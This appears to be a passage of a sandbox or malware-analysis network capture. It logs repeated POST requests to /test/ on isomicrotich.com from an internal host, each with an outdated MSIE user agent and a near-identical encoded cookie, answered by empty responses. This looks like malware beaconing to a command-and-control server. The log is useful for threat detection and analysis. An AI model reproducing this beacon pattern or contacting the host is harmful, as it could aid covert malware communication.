                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:47:43 UTC | 569 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:43 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2WwR3nzhCLSTULlKOJ6D9qSOhKqloWlzTbcF9lyJUAPcamZKGqUJJ%2BYbFuTQ1WaT5WRnspVoHEU%2FNXf2itSu%2F64p1EqPKubj%2B0Tr1Zb45Y%2BKOIUzjgLrB03ZcrlTuJxYY8BE"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1a2d8a2c42a5-EWR
                                                                                                                                                                                                                                                2024-10-03 18:47:43 UTC  5  IN  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session ID  Source IP  Source Port  Destination IP  Destination Port
                                                                                                                                                                                                                                                63  192.168.2.7  62368  188.114.97.3  443
                                                                                                                                                                                                                                                Timestamp  Bytes transferred  Direction  Data
                                                                                                                                                                                                                                                2024-10-03 18:47:44 UTC  421  OUT  POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFn4OSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:47:45 UTC  571  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:45 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IU2X2xVonRCEYAC8tk6o7YyXZNqLWF4UGyGgFxlN5O%2F0j2LSF7rLkD%2F%2F%2BsWYD79%2FlXArKMD30Krv3HhkAXsz1%2BNDGoSOqQJ1PNsAp8lY7U8FcQut7ZSHdajgcEHAbngs61Cf"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1a38da5078df-EWR
                                                                                                                                                                                                                                                2024-10-03 18:47:45 UTC  5  IN  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session ID  Source IP  Source Port  Destination IP  Destination Port
                                                                                                                                                                                                                                                64  192.168.2.7  62371  188.114.97.3  443
                                                                                                                                                                                                                                                Timestamp  Bytes transferred  Direction  Data
                                                                                                                                                                                                                                                2024-10-03 18:47:45 UTC  421  OUT  POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFn5+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:47:46 UTC  565  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:46 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UCF1cj65qaWlWTXacv0UWgd5WQTRhXEbdVPcrIzskm4oDQc7Sfxgs9RSb%2BvXCDVwRnyMhJwQkSdI9wRKfG2wGxjq%2BUOa%2BcHIjZTjdhMCJVkf2iIJZkB14JlBUVfx6EvmC6h6"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1a3f78518c8f-EWR
                                                                                                                                                                                                                                                2024-10-03 18:47:46 UTC  5  IN  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session ID  Source IP  Source Port  Destination IP  Destination Port
                                                                                                                                                                                                                                                65  192.168.2.7  62372  188.114.97.3  443
                                                                                                                                                                                                                                                Timestamp  Bytes transferred  Direction  Data
                                                                                                                                                                                                                                                2024-10-03 18:47:47 UTC  421  OUT  POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFn5uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:47:47 UTC  567  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:47 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=faVK3KPo%2BAVdF9xODUJIItJj9CVgWC2RagEHFSoUM%2Fv9d%2FbmcPwoYc7LanAScNGtVNXrCrFeX6lyLFOUDDV5ayDtI0WVA0hJz4SD3LFtER73OwHZPcKFr%2BVkRe74eb3YZqBc"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1a49bfd58c0f-EWR
                                                                                                                                                                                                                                                2024-10-03 18:47:47 UTC  5  IN  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session ID  Source IP  Source Port  Destination IP  Destination Port
                                                                                                                                                                                                                                                66  192.168.2.7  62373  188.114.97.3  443
                                                                                                                                                                                                                                                Timestamp  Bytes transferred  Direction  Data
                                                                                                                                                                                                                                                2024-10-03 18:47:49 UTC  421  OUT  POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFn5eSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:47:49 UTC  544  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:49 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V4qvM8WzzNlkU%2BFwliywEgkNYHsMhhoNvlM4xpNJ16Ri%2BVzQIVODJskHjsbLKa%2BAgQDLvhYmQ0y7UQR2o34apsRFyyUMP9ojoQ1JbuOq6XGh7TOFtwaPNJkpDv%2FCaHn6SYbP"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1a544ce3c484-EWR
                                                                                                                                                                                                                                                2024-10-03 18:47:49 UTC  5  IN  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session ID  Source IP  Source Port  Destination IP  Destination Port
                                                                                                                                                                                                                                                67  192.168.2.7  62375  188.114.97.3  443
                                                                                                                                                                                                                                                Timestamp  Bytes transferred  Direction  Data
                                                                                                                                                                                                                                                2024-10-03 18:47:50 UTC  421  OUT  POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFn5OSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:47:50 UTC | 542 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:50 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xrlW2uRzFv70cn0np9SKFUjKCBpgscjawFeBQinaCRUw7zhpnmLnjRUjFAI1CxH3TkHrB55O6Vf%2FNTZZOFaJO7huUiIW8rYabiwZX5eIX2%2BThk8XzQ7mCuES1H%2BpbBUc6yhl"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1a5aed4643ec-EWR
2024-10-03 18:47:50 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
68 | 192.168.2.7 | 62377 | 188.114.97.3 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:47:51 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFn6+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:47:51 UTC | 567 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:51 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UzpuSLhaGCsL9160A%2BIRdj5hAlGxVUsYX8b24b4uL7EQZR0V3xf4H36u4zkrN4XfHiz%2BJ5a5%2B5LvIZYm6piBKhfsuCHTT0lIsOmiTveYY43Dudf3YIqls5PyVykub%2B89SZJV"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1a617ae37cae-EWR
2024-10-03 18:47:51 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
69 | 192.168.2.7 | 62379 | 188.114.97.3 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:47:52 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFn6uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:47:52 UTC | 569 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:52 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JgnA8hqhuReTvQ0xkQvHzZm4SFVb%2BhkWoQ94FfkM9N3%2BtHnN7SkqwLxiD9Xb%2Bj8iRVF%2FXB3GWdTl44xatOWsHXhWSvkvjHkKKY%2FibxoOyukfMGC86K6Unqy7VN4Evx07KfdI"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1a6a5b8941ef-EWR
2024-10-03 18:47:52 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
70 | 192.168.2.7 | 62380 | 188.114.97.3 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:47:53 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFm4+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:47:54 UTC | 542 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:53 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TpwzzbmRBVwUo3cLgSVx5CDthM%2FRe9bUKbQaq3yqjggNjoKnVABWDjPF88PjUPVum966wEBdZhAPvcIQVSzmbXTY3M549STAMbPOsGcs4V6HYFp24t8cdWo%2Bta%2Bkbsns7Hwa"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1a708c62726b-EWR
2024-10-03 18:47:54 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
71 | 192.168.2.7 | 62381 | 188.114.97.3 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:47:54 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFm4uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:47:54 UTC | 548 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:54 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QQJC5nzh3N%2BNVhiljg8XnhGYfxQU1ej8DZvH%2Bak0tBigv5te9PVGM8uh%2FYjxbZLuhTDDM%2BVezMua1dj4hwDT%2Bkir0Hw26btXJsj%2FyRIzKSe3OU6YfVZGDY0OB9cof31sp7tw"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1a770a524411-EWR
2024-10-03 18:47:54 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
72 | 192.168.2.7 | 62383 | 188.114.97.3 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:47:55 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFm4eSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:47:56 UTC | 548 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:56 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kHQNjTpvqd67qtUi1Num2z0jtt8i%2B%2F%2FajaEbbVVQuDjM4HBGwzvi4zdovjjXSnu22xOBmOagkd1%2FaS%2BNH6zYTipuQ9B4I8OXgp03K2UzdDjh%2FXy59beSY92aokKtvfSZKD44"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1a7dcb760ca8-EWR
2024-10-03 18:47:56 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
73 | 192.168.2.7 | 62386 | 188.114.97.3 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:47:56 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFm4OSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:47:57 UTC | 540 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:57 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=we5kppP9ghDzAt%2BpP0Di2ouX9XFPhInZ3q8imTeCfwbhXSytTmyXHzuMI0oWEbOZAb2nr7wmzcF89JwyycuJn96%2B2Bmbj2XUE7xi9e5mDay2VIUxUFwsKPQFsVlEhfSnJTuF"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1a84efbd4310-EWR
2024-10-03 18:47:57 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
74 | 192.168.2.7 | 62387 | 188.114.97.3 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:47:58 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFm5+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:47:59 UTC | 548 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:59 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KLw1Q03IXnPYVSrnM4bYtlFs%2BogcfQ%2B8lBitSsHeUXYjrZ9qdQ4FT4YItGauCvCQajEm5FgzzWeHGT5oKenhToYt1BKyB8BKs%2BAtJxJ%2BlOIJGmOFProQfhgcR2k%2BXtP2%2BBlQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1a90a9c5c425-EWR
2024-10-03 18:47:59 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
75 | 192.168.2.7 | 62389 | 188.114.97.3 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:47:59 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFm5uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
